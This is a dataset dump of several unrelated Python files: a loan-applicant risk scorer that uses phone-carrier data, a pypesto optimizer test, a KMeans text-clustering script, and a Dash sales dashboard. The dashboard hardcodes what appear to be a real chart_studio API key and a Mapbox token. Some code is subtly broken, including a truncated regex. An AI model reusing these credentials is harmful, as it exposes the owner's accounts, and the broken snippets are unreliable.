total_remark\n }\n\n if apply_number:\n save_to_cache(apply_number, res, 'msg_record_view')\n\n res['msgDetail'] = res['msgDetail'][start: end]\n\n return res\n\n def credit_risk_calculate(self, data=None, online_data=None, now=None, source='mashang'):\n \"\"\" 贷前风险评估 失联风险 \"\"\"\n\n assess = {\n RiskEvaluation.O: 0,\n RiskEvaluation.N: 0,\n RiskEvaluation.S: 0,\n RiskEvaluation.M: 0,\n RiskEvaluation.L: 0,\n RiskEvaluation.XL: 0,\n }\n ret_lis = []\n\n if data is None:\n data = self.data\n if not data:\n assess[RiskEvaluation.N] += 1\n ret_lis.append('未进行运营商授权,无法判断')\n return {\n 'assess': assess,\n 'result': ret_lis,\n }\n result = {\n 1: 0, # 低\n 2: 0,\n 3: 0,\n 4: 0}\n # 手机在网时长\n phone_register_t = data.get(\"phoneInfo\", {}).get(\"inNetDate\", \"6月\")\n has_time = data.get(\"phoneInfo\", {}).get(\"netAge\", \"6月\")\n # has_time = data.get(\"\")\n\n ###############################################\n # 这是从运营商数据获取在��时长的版本, 现在不要了\n ###############################################\n # def long_time_handler(m):\n # d = m\n # all_nums_char = [str(i) for i in range(0, 11)]\n # other_char = set()\n\n # for i in d:\n # if i not in all_nums_char:\n # other_char.add(i)\n # for i in other_char:\n # d = d.replace(i, ';')\n # d = d.split(';')\n # d = list(filter(lambda x: x, d))\n # if len(d) == 0:\n # return True\n # elif len(d) == 1:\n # if '月' in m and int(d[0]) > 3:\n # return True\n # if '年' in m and int(d[0]) > 0:\n # return True\n # return False\n # elif len(d) >= 2:\n # if int(d[0]) > 0 or int(d[1]) >= 3:\n # return True\n # return False\n\n ################################\n # 这是从查询的在网时长接口的版本\n ################################\n def long_time_handler_mashang(m):\n\n from app.credit.pipeline import mashang_online\n parsed_online_data = mashang_online(online_data)['timeRange']\n\n # 没查在网时长接口默认风险低\n if not online_data:\n return True\n p1 = re.compile('(\\d+)-(\\d+)个月')\n p2 = re.compile('(\\d+)个月以上')\n r1 = p1.match(parsed_online_data)\n r2 = p2.match(parsed_online_data)\n if r1:\n online_int = int(r1.groups()[1])\n elif r2:\n online_int = int(r2.groups()[0])\n else:\n online_int = 1000\n\n if online_int < 3:\n return False\n\n return True\n\n ################################\n # 这是查询中诚信在网时长的版本\n ################################\n def long_time_handler_zhongchengxin(m):\n\n from app.credit.pipeline import handle_operator_phonetime\n parsed_online_data = handle_operator_phonetime(online_data)['timeRange']\n\n # 没查在网时长接口默认风险低\n if not online_data:\n return True\n p1 = re.compile('(\\d+)-(\\d+)个月')\n p2 = re.compile('(\\d+)个月以上')\n r1 = p1.match(parsed_online_data)\n r2 = p2.match(parsed_online_data)\n if r1:\n online_int = int(r1.groups()[1])\n elif r2:\n online_int = int(r2.groups()[0])\n else:\n online_int = 1000\n\n if online_int < 3:\n return False\n\n return True\n\n if source == 'mashang':\n if long_time_handler_mashang(has_time) is False:\n assess[RiskEvaluation.M] += 1\n ret_lis.append('手机号使用时间低于正常值范围')\n result[2] += 1\n elif source == 'zhongchengxin':\n if long_time_handler_zhongchengxin(has_time) is False:\n assess[RiskEvaluation.M] += 1\n ret_lis.append('手机号使用时间低于正常值范围')\n result[2] += 1\n\n today_t = datetime.datetime.now()\n today_str = '%d%02d%02d'.format(today_t.year, today_t.month, today_t.day)\n if phone_register_t == today_str:\n assess[RiskEvaluation.L] += 1\n ret_lis.append('手机号为申请日当天注册,借款人失联风险高')\n result[4] += 1\n # 联系人数量\n obj = self.contract_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), True)\n\n if (obj.get(\"result\", 0) or 0) < 10:\n assess[RiskEvaluation.M] += 1\n ret_lis.append('近6个月联系人数量{}人,低于正常值范围'.format(obj.get(\"result\", 0)))\n result[2] += 1\n\n obj = self.contact_phone_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), True)\n\n if (obj.get(\"result\", 0) or 0) <= 5:\n assess[RiskEvaluation.M] += 1\n ret_lis.append(\"近6个月互通电话数量{}个,低于正常值范围\".format(obj.get(\"result\", 0)))\n result[2] += 1\n\n obj = self.long_time_slicense(data.get('deceitRisk', {}).get(\"silenceInfo\", []), False, now)\n max_result = obj.get('max_result', 0) or 0\n\n if 10 < max_result < 30:\n assess[RiskEvaluation.M] += 1\n ret_lis.append(\"手机号连续静默时间{}天,超过正常值范围\".format(max_result))\n result[2] += 1\n elif max_result >= 30:\n assess[RiskEvaluation.L] += 1\n ret_lis.append(\"手机号连续静默时间{}天,静默时间过长,借款人失联风险高\".format(max_result))\n result[4] += 1\n\n level = 1\n li_ = list(range(1, 4))\n li_.reverse()\n for i in li_:\n if result[i] > 0:\n level = i\n break\n\n return {\n 'assess': assess,\n 'result': ret_lis,\n }\n\n\nif __name__ == '__main__':\n\n data = None\n with open(\"data.json\", 'r') as fp:\n data = fp.read()\n import json\n data = json.loads(data)\n d = UserExceptionAction(data.get('data'))\n ret = d.credit_risk_calculate(data.get('data'))\n\n", "repo_name": "leolinf/flask-demo", "sub_path": "risk/app/capcha_report/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 50076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.localtime", "line_number": 36, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 85, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 325, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 325, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 330, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 330, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 332, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 332, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 336, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 336, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 411, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 519, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 519, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 570, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 570, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 622, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 622, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 795, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 808, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 808, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 810, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 810, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 822, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 849, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 849, "usage_type": "attribute"}, {"api_name": "app.core.functions.save_to_cache", "line_number": 1172, "usage_type": "call"}, {"api_name": "app.core.functions.save_to_cache", "line_number": 1226, "usage_type": "call"}, {"api_name": "constants.RiskEvaluation.O", "line_number": 1236, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1236, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.N", "line_number": 1237, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1237, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.S", "line_number": 1238, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1238, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1239, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1239, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.L", "line_number": 1240, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1240, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.XL", "line_number": 1241, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1241, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.N", "line_number": 1248, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1248, "usage_type": "name"}, {"api_name": "app.credit.pipeline.mashang_online", "line_number": 1298, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1303, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1304, "usage_type": "call"}, {"api_name": "app.credit.pipeline.handle_operator_phonetime", "line_number": 1325, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1330, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1331, "usage_type": "call"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1348, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1348, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1353, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1353, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1357, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1357, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation.L", "line_number": 1360, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1360, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1367, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1374, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1374, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1382, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1382, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.L", "line_number": 1386, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1386, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1410, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'json': 'json', 'reduce': 'functools.reduce', 'mashang_online': 'app.credit.pipeline.mashang_online', 'handle_operator_phonetime': 'app.credit.pipeline.handle_operator_phonetime'}", "line_number": 1411, "usage_type": "call"}]}
+{"seq_id": "1344116375", "text": "\"\"\"\nThis is for testing optimization of the pypesto.Objective.\n\"\"\"\n\n\nimport numpy as np\nimport pypesto\nimport pytest\nimport test.test_objective as test_objective\nimport warnings\nimport re\n\n\n@pytest.fixture(params=['separated', 'integrated'])\ndef mode(request):\n return request.param\n\n\noptimizers = [\n *[('scipy', method) for method in [\n 'Nelder-Mead', 'Powell', 'CG', 'BFGS', 'Newton-CG',\n 'L-BFGS-B', 'TNC', 'COBYLA', 'SLSQP',\n 'trust-ncg', 'trust-exact', 'trust-krylov',\n 'ls_trf', 'ls_dogbox']],\n # disabled: ,'trust-constr', 'ls_lm', 'dogleg'\n ('dlib', 'default'),\n ('pyswarm', ''),\n]\n\n\n@pytest.fixture(params=optimizers)\ndef optimizer(request):\n return request.param\n\n\ndef test_optimization(mode, optimizer):\n \"\"\"Test optimization using various optimizers and objective modes.\"\"\"\n if mode == 'separated':\n obj = test_objective.rosen_for_sensi(max_sensi_order=2,\n integrated=False)['obj']\n else: # mode == 'integrated':\n obj = test_objective.rosen_for_sensi(max_sensi_order=2,\n integrated=True)['obj']\n\n library, method = optimizer\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n if re.match(r'^(?i)(ls_)', method):\n # obj has no residuals\n with pytest.raises(Exception):\n check_minimize(obj, library, method)\n # no error when allow failed starts\n check_minimize(obj, library, method, allow_failed_starts=True)\n else:\n check_minimize(obj, library, method)\n\n\ndef check_minimize(objective, library, solver, allow_failed_starts=False):\n\n options = {\n 'maxiter': 100\n }\n\n optimizer = None\n\n if library == 'scipy':\n optimizer = pypesto.ScipyOptimizer(method=solver,\n options=options)\n elif library == 'dlib':\n optimizer = pypesto.DlibOptimizer(method=solver,\n options=options)\n elif library == 'pyswarm':\n optimizer = pypesto.PyswarmOptimizer(options=options)\n\n lb = 0 * np.ones((1, 2))\n ub = 1 * np.ones((1, 2))\n problem = pypesto.Problem(objective, lb, ub)\n\n optimize_options = pypesto.OptimizeOptions(\n allow_failed_starts=allow_failed_starts)\n\n result = pypesto.minimize(\n problem=problem,\n optimizer=optimizer,\n n_starts=1,\n startpoint_method=pypesto.startpoint.uniform,\n options=optimize_options\n )\n\n assert isinstance(result.optimize_result.list[0]['fval'], float)\n", "repo_name": "martamatos/pyPESTO", "sub_path": "test/test_optimize.py", "file_name": "test_optimize.py", "file_ext": "py", "file_size_in_byte": 2639, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 31, "usage_type": "call"}, {"api_name": "test.test_objective.rosen_for_sensi", "line_number": 39, "usage_type": "call"}, {"api_name": "test.test_objective", "line_number": 39, "usage_type": "name"}, {"api_name": "test.test_objective.rosen_for_sensi", "line_number": 42, "usage_type": "call"}, {"api_name": "test.test_objective", "line_number": 42, "usage_type": "name"}, {"api_name": "warnings.catch_warnings", "line_number": 47, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 48, "usage_type": "call"}, {"api_name": "re.match", "line_number": 49, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 51, "usage_type": "call"}, {"api_name": "pypesto.ScipyOptimizer", "line_number": 68, "usage_type": "call"}, {"api_name": "pypesto.DlibOptimizer", "line_number": 71, "usage_type": "call"}, {"api_name": "pypesto.PyswarmOptimizer", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 77, "usage_type": "call"}, {"api_name": "pypesto.Problem", "line_number": 78, "usage_type": "call"}, {"api_name": "pypesto.OptimizeOptions", "line_number": 80, "usage_type": "call"}, {"api_name": "pypesto.minimize", "line_number": 83, "usage_type": "call"}, {"api_name": "pypesto.startpoint", "line_number": 87, "usage_type": "attribute"}]}
+{"seq_id": "34595580288", "text": "'jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'\n'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'\n\n\n\nimport pandas as pd\nimport re\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n\nMIN_WORDS = 3\nMAX_WORDS = 30\nSTOPWORDS = set(stopwords.words('english'))\n\ndef clean_text(text):\n \"\"\"\n Series of cleaning. String to lower case, remove non words characters and numbers.\n text (str): input text\n return (str): modified initial text\n \"\"\"\n PATTERN_S = re.compile(\"\\'s\") # matches `'s` from text`\n PATTERN_RN = re.compile(\"\\\\r\\\\n\") #matches `\\r` and `\\n`\n PATTERN_PUNC = re.compile(r\"[^\\w\\s]\") # matches all non 0-9 A-z whitespace\n PATTERN_1 = re.compile(r\"\\b(? min_words and len(w) < max_words)]\n # remove new stopwords from the token list\n tokens = [w for w in tokens if w not in stopwords]\n return tokens\n\ndef clean_sentences(df, output_file):\n \"\"\"\n Remove irrelevant characters (in new column clean_sentence).\n Lemmatize, tokenize words into list of words (in new column tok_lem_sentence).\n Save DataFrame to CSV file with additional column.\n \"\"\"\n print('Cleaning sentences...')\n df['clean_sentence'] = df['Document_Description'].apply(clean_text)\n df['tok_lem_sentence'] = df['clean_sentence'].apply(\n lambda x: tokenizer(x, min_words=MIN_WORDS, max_words=MAX_WORDS, stopwords=STOPWORDS, lemmatize=True))\n df.to_csv(output_file, index=False)\n return df\n\n\n\ndf['Document_Description'] = df['Document_Description'].astype(str)\n\n\nfrom sklearn.model_selection import GridSearchCV\n\n# Define a set of hyperparameters and their corresponding values to search over\nparam_grid = {\n 'n_clusters': [3, 5, 7, 9],\n 'max_iter': [50, 100, 200, 500],\n 'tol': [0.0001, 0.001, 0.01, 0.1],\n 'random_state': [42]\n}\n\n# Create a K-Means model\nkmeans = KMeans()\n\n# Perform Grid Search to find the best hyperparameters\ngrid_search = GridSearchCV(kmeans, param_grid=param_grid, cv=5, n_jobs=-1)\ngrid_search.fit(vectorized_docs)\n\n# Print the best hyperparameters and the corresponding performance score\nprint(\"Best hyperparameters:\", grid_search.best_params_)\nprint(\"Best score:\", grid_search.best_score_)\n\n\n\ninertia_scores = []\nsilhouette_scores = []\ndb_scores = []\nfor k in range(2, 21):\n kmeans = KMeans(n_clusters=k, max_iter=50)\n cluster_labels = kmeans.fit_predict(vectorized_docs)\n inertia_scores.append(kmeans.inertia_)\n silhouette_scores.append(silhouette_score(vectorized_docs, cluster_labels))\n db_scores.append(davies_bouldin_score(vectorized_docs.toarray(), cluster_labels))\n\n# Plot the elbow curve\nimport matplotlib.pyplot as plt\nplt.plot(range(2, 21), inertia_scores)\nplt.xlabel('Number of Clusters')\nplt.ylabel('Inertia')\nplt.show()\n\n# Plot silhouette scores\nplt.plot(range(2, 21), silhouette_scores)\nplt.xlabel('Number of Clusters')\nplt.ylabel('Silhouette Score')\nplt.show()\n\n# Plot Davies-Bouldin index\nplt.plot(range(2, 21), db_scores)\nplt.xlabel('Number of Clusters')\nplt.ylabel('Davies-Bouldin Index')\nplt.show()\n\n\n\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint\nfrom sklearn.cluster import KMeans\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\n\n# Load and preprocess Confluence documentation pages\nconfluence_docs = pd.read_csv('confluence_docs.csv')\npreprocessed_docs = preprocess_text(confluence_docs['text'])\n\n# Convert preprocessed text to numerical vectors using TF-IDF\nvectorizer = TfidfVectorizer()\nvectorized_docs = vectorizer.fit_transform(preprocessed_docs)\n\n# Define a set of hyperparameters and their corresponding values to search over\nparam_dist = {\n 'n_clusters': randint(3, 21),\n 'max_iter': randint(50, 500),\n 'tol': [0.0001, 0.001, 0.01, 0.1],\n 'random_state': [42]\n}\n\n# Create a K-Means model\nkmeans = KMeans()\n\n# Perform Randomized Search to find the best hyperparameters\nrandom_search = RandomizedSearchCV(kmeans, param_distributions=param_dist, cv=5, n_jobs=-1, n_iter=20)\nrandom_search.fit(vectorized_docs)\n\n# Print the best hyperparameters and the corresponding performance score\nprint(\"Best hyperparameters:\", random_search.best_params_)\nprint(\"Best score:\", random_search.best_score_)\n\n\n\n", "repo_name": "codepradosh/Movie-Recommendation-system", "sub_path": "stopwords.py", "file_name": "stopwords.py", "file_ext": "py", "file_size_in_byte": 5297, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 14, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 14, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 22, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 30, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 35, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 44, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 45, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 47, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 50, "usage_type": "name"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 138, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 153, "usage_type": "call"}]}
+{"seq_id": "20718365134", "text": "import chart_studio\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom dash import callback_context\nimport dash_daq as daq\n\nchart_studio.tools.set_credentials_file(username='griffin123', api_key='XLkOUTSmAhXbMImJGRd2')\nmapbox_access_token = 'pk.eyJ1IjoiZ3JpZmZpbjEyMyIsImEiOiJjazV2YnFndHIwYmliM2ptZGNiMGpxbDE1In0._iZvbdWb--5eNSF7Q3sI9g'\n\nn = 100 # every 100th line = 1% of the lines\n# df = pd.read_csv(filename, header=0, skiprows=lambda i: i % n != 0)\nbuildings = pd.read_csv(\"../sample2.csv\",on_bad_lines='skip')\nDATE = \"GWAERDATH1\"\nbuildings[DATE] = buildings[DATE].fillna(method=\"bfill\")\nbuildings = buildings.fillna(0)\nbuildings['YEAR'] = [str(str(i)[:4]) for i in list(buildings[DATE])]\nyears = list(buildings['YEAR'].unique())\ncolors = [\"#7FB290\", \"#83DBEE\", \"#D67445\",\"#90f5d3\",\"#dd90f5\",\"#fc425e\", \"#faf06b\", \"#629bfc\", \"#3C799D\", \"green\", \"brown\", \"yellow\"]\nnames = [\"Product \" + str(int(i+1)) for i in range(10)]\n\nmapping = {list(buildings['GKSCE'].unique())[i]:colors[i] for i in range(len(list(buildings['GKSCE'].unique())))}\nmapping2= {list(buildings['GKSCE'].unique())[i]:names[i] for i in range(len(list(buildings['GKSCE'].unique())))}\nbuildings['PRODUCT'] = [mapping2[elt] for elt in list(buildings['GKSCE'])]\n\nfig3 = go.Figure()\npie = go.Figure()\nfig4 = go.Figure()\nmu=0\nsigma=20\niyrs = range(2000, 2022, 1)\nprint(iyrs)\nxs1 = []\nys1 = []\n\nfor elt in list(buildings['GDEKT'].unique()):\n\n xs = []\n ys = []\n\n for yr in iyrs:\n if int(yr) > 2003:\n tmp = buildings[(buildings['GDEKT'] == elt) & (buildings['YEAR'] == str(yr))]\n ys.append(sum(list(tmp['GANZWHG'])))\n xs.append(int(yr))\n\n else:\n continue\n fig4.add_trace(\n go.Scatter(\n y=ys,\n x=xs,\n name=elt,\n marker={\n # \"color\":colors[e],\n }\n )\n )\ne = -1\n\ntxs = []\ntys = []\n\nfor elt in list(buildings['PRODUCT'].unique()):\n e += 1\n xs = []\n ys = []\n tmp1 = buildings[buildings['PRODUCT'] == elt]\n tys.append(elt)\n txs.append(sum(list(tmp1['GANZWHG'])))\n for yr in years:\n if int(yr) > 2003:\n tmp = buildings[(buildings['PRODUCT'] == elt) & (buildings['YEAR'] == yr)]\n xs.append(sum(list(tmp['GANZWHG'])))\n ys.append(int(yr))\n\n else:\n continue\n fig3.add_trace(\n go.Bar(\n y=ys,\n x=xs,\n name=elt,\n orientation=\"h\",\n marker={\n \"color\":colors[e],\n }\n )\n )\nfig3.update_layout(\n plot_bgcolor=\"rgba(0,0,0,0)\",\n paper_bgcolor=\"rgba(0,0,0,0)\",\n margin=dict(l=0, r=0, t=35, b=0),\n font_family=\"Paytone One\",\n font_color=\"#3C799D\",\n title=\"Number of Yearly Sales\",\n font_size=16,\n height=300\n)\nfig4.update_layout(\n plot_bgcolor=\"rgba(0,0,0,0)\",\n paper_bgcolor=\"rgba(0,0,0,0)\",\n margin=dict(l=0, r=0, t=50, b=0),\n font_family=\"Paytone One\",\n font_color=\"#3C799D\",\n title=\"Yearly Sales by Canton\",\n font_size=16,\n height=300\n)\npie.add_trace(\n go.Pie(\n labels=tys,\n values=txs,\n name=\"Total Distribution of Sales\",\n marker_colors=colors\n )\n)\npie.update_layout(\n plot_bgcolor=\"rgba(0,0,0,0)\",\n paper_bgcolor=\"rgba(0,0,0,0)\",\n showlegend=False,\n margin=dict(l=0, r=0, t=35, b=0),\n font_family=\"Paytone One\",\n font_color=\"#3C799D\",\n title=\"Distribution of Yearly Sales\",\n font_size=16,\n height=300\n)\nfig3.update_layout(barmode='stack')\n\nfig = go.Figure()\n\nfig.add_trace(\n go.Scattermapbox(\n lat = buildings['long'],\n lon = buildings['lat'],\n mode=\"markers\",\n text=[mapping2[elt] for elt in list(buildings['GKSCE'])],\n marker=go.scattermapbox.Marker(\n size=[max(x*2, 5) for x in list(buildings['GANZWHG'])],\n color=[mapping[elt] for elt in list(buildings['GKSCE'])],\n\n )\n )\n)\n\nfig.update_layout(\n hovermode='closest',\n mapbox=go.layout.Mapbox(\n accesstoken=mapbox_access_token,\n bearing=0,\n style=\"mapbox://styles/griffin123/clesip64o00jn01lk5bl0fqku\",\n center=go.layout.mapbox.Center(\n lat=46.849110,\n lon=8.392482\n ),\n pitch=0,\n zoom=7.8,\n ),\n plot_bgcolor=\"rgba(0,0,0,0)\", paper_bgcolor=\"rgba(0,0,0,0)\"\n)\n#\n# fig2 = go.Figure()\n\nfig.update_layout(\n margin=dict(l=0, r=0, t=0, b=0),\n)\n\napp = dash.Dash(\n external_stylesheets=[\n dbc.themes.CYBORG,\n dbc.icons.FONT_AWESOME,\n 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css',\n \"https://fonts.googleapis.com/css2?family=Paytone+One&display=swap\"\n ]\n )\n\npcard = dbc.Card(\n [\n dbc.Row(\n [\n dbc.Col(\n dbc.CardImg(\n src=\"/assets/mugshot-modified.png\",\n className=\"img-fluid rounded-start\",\n ),\n className=\"col-md-4\",\n style={\"margin-left\":\"1vw\",\"height\":\"4vh\",\"width\":\"4vw\"}\n ),\n dbc.Col(\n dbc.CardBody(\n [\n html.H5(\"Welcome, GW\", className=\"card-title\",style={\"color\":\"white\"}),\n html.P(\n \"This is a sample dashboard using static data. It can be easily modified to fit your use case!\",\n className=\"card-text\",\n style={\n \"font-size\":\"14px\"\n }\n ),\n html.Small(\n \"Last login 3 mins ago\",\n className=\"card-text text-muted\",\n ),\n ]\n ),\n className=\"col-md-8\",\n ),\n ],\n className=\"g-0 d-flex align-items-center\",\n )\n ],\n className=\"mb-3\",\n style={\n \"maxWidth\": \"540px\",\n \"margin-right\":\"1vw\",\n \"margin-left\":\"1vw\",\n \"margin-top\":\"6vh\",\n \"background-color\":\"#2B323D\",\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-weight\":\"1px\",\n \"border-color\":\"white\"\n },\n)\n\napp.layout = html.Div([\n dbc.Row([\n html.H3(\"Your Company Name\",\n style={\n \"font-size\":\"4vh\",\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n 